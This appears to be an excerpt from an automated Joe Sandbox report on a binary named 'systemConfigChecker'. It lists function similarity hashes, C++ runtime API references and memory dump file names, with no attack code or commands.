              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task
              • String ID:
              • API String ID: 118556049-3916222277
              • Opcode ID: e525968f3bcce64392877eb82988f276976157d7ad8acd84272c50dfdb48e0f4
              • Instruction ID: 300221a54ccb4423d4c350e0fb7bf19cac50bbe92d93bb313c8b03a89315cd43
              • Opcode Fuzzy Hash: e525968f3bcce64392877eb82988f276976157d7ad8acd84272c50dfdb48e0f4
              • Instruction Fuzzy Hash: C251687274CB4596EB15AF2AD49026D37A0FB58B94F584632EF4D83BA4DF38E0A1C700
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: __current_exception__current_exception_contextterminate
              • String ID: csm
              • API String ID: 2542180945-1018135373
              • Opcode ID: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
              • Instruction ID: f00a97d329bbf6e42cc215415fb2bdfcc9240ac918c058761a683746aae45a4d
              • Opcode Fuzzy Hash: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
              • Instruction Fuzzy Hash: 1CF0F937649B84CAE714BF21E8801AC3764FB5CB98B495170FA4D87B55CF38D8A08B50
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
              • String ID:
              • API String ID: 1155477157-0
              • Opcode ID: eaf3c19ad4d0e686500c82fd6c9687f926ff04beca4be6b011ccc32704aa8542
              • Instruction ID: 4b94af7f5d5529e84c4b1d9cfc82f4f0d51d6df94b8ecb55436c82838688f925
              • Opcode Fuzzy Hash: eaf3c19ad4d0e686500c82fd6c9687f926ff04beca4be6b011ccc32704aa8542
              • Instruction Fuzzy Hash: 1331E3A2B4D68684FE15BF55A5003B912919B25FE4F544631EE2D87FC9EE3CE481CB00
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task
              • String ID:
              • API String ID: 118556049-0
              • Opcode ID: 1ef9cebed11aa757f790f007fe67e90c90a9a1ada4030d4e0cebe6aba601f67a
              • Instruction ID: bfd475a80b3dcd44580fccdc2132f7c3899eaffb02677f71aa6b1e0875acf4eb
              • Opcode Fuzzy Hash: 1ef9cebed11aa757f790f007fe67e90c90a9a1ada4030d4e0cebe6aba601f67a
              • Instruction Fuzzy Hash: 4721CD20B5C29A59FD183B7749098A61616AF35FF0E384B31FE7C87FD2DD28E4428A00
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fed82e02baa9a700fae8dd61e3f5e5d4e6d578d09e70afdffe5bad35c6b6e123
              • Instruction ID: 9351447dc35c3c0bc91134d309fdf0d9cc727b5f4ed6548e0c83ded2e68da14e
              • Opcode Fuzzy Hash: fed82e02baa9a700fae8dd61e3f5e5d4e6d578d09e70afdffe5bad35c6b6e123
              • Instruction Fuzzy Hash: D851667270CB8285EB10AF29E45036EB7A5FB94B94F544236EA9D87B98DF3CD444CB00
              APIs
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF64E135133), ref: 00007FF64E139F3A
                • Part of subcall function 00007FF64E13B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF64E13107B), ref: 00007FF64E13B522
              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF64E135133), ref: 00007FF64E139F65
              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF64E135133), ref: 00007FF64E139F75
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E139FA9
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
              • String ID:
              • API String ID: 1155477157-0
              • Opcode ID: fead59cf91176764882eea427c2a42ff201302449ae88b393c1fe2f54dd12570
              • Instruction ID: da691eebb724c74fcaab38abe22ad9f946c81aa3c2f559e99f719a4b6ce64687
              • Opcode Fuzzy Hash: fead59cf91176764882eea427c2a42ff201302449ae88b393c1fe2f54dd12570
              • Instruction Fuzzy Hash: 9F418062B19A4181FA10FB12A4406A96694EB68BF4F548731FE7D87FD4EE3CD4918700
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
              • String ID:
              • API String ID: 1155477157-0
              • Opcode ID: 34d6b8b8f85d502dd3e974caf13f3a255f62ba7057ab9783194fbc3a16eacf1c
              • Instruction ID: cc082487297fcff0a686167fa23f3e55a95b95cb13c81b0df1185b2061e5c0f1
              • Opcode Fuzzy Hash: 34d6b8b8f85d502dd3e974caf13f3a255f62ba7057ab9783194fbc3a16eacf1c
              • Instruction Fuzzy Hash: 9C31B562B4DB4181FA14BB12A5402BD62A5EB25BB0F244B34FE7D87BD1DF3CE4928740
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task
              • String ID:
              • API String ID: 326894585-0
              • Opcode ID: bb3c3e09e16725125c818d18fe87c36af5fe47e3bf638568bff9307805f37345
              • Instruction ID: dac6da307dc8daec68d6011bcbaa99383eebc8a7f9bf476ca257d19275b7fc70
              • Opcode Fuzzy Hash: bb3c3e09e16725125c818d18fe87c36af5fe47e3bf638568bff9307805f37345
              • Instruction Fuzzy Hash: 1521D662B8D74249FA24BB11A4403B926509B257B4F180B31FEAD87FD7DE7CE4928B00